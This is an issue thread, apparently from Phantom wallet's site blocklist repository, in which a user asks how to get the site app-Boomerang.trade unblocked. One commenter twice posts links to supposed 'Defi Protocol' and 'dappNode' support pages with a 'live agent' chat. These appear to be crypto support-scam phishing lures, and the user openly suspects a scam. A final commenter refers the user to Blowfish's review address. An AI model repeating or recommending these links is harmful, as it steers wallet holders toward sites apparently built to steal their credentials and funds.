### ISSUE TITLE
app-Boomerang.trade

### ISSUE THREAD

**Issue by tradercentral** [phantom/blocklist#1125]
How does one get this site whitelisted and accessible with the phantom wallet extension installed in chrome ?? does someone whitelist it  or take it off the banned list ?? who decides if it should be banned?? i noticed requests to have it unbanned but it still is why?? ill have to uninstall phantom to get access or is there another way??

**Comment by Nivanary** [comment]
Contact the Defi Protocol page to initiate a chat with the live agent on the chat button to get more information about your request via [DEFI PROTOCOL](https://accessonlinedefiprotocol.web.app/)

**Comment by Nivanary** [comment]
Visit the official dappNode page to rectify the error and unblock your site. Also you can initiate a chat with the live agent on site to assist you for further requirement via [dappNode](https://defi-fixprotocol.pages.dev/).

**Comment by tradercentral** [comment]
This is what I get when I click on  your dappNode link??
How do you explain this ?
So I cant get to the live chat site or is this a scam site as well
***@***.***

**Comment by Nivanary** [comment]
Are you able to start a chat with an agent on live chat to assist you?

**Comment by Harii94** [comment]
Hi,

Please forward these details to the Blowfish team for further investigation. You can reach them at: review@blowfish.xyz.
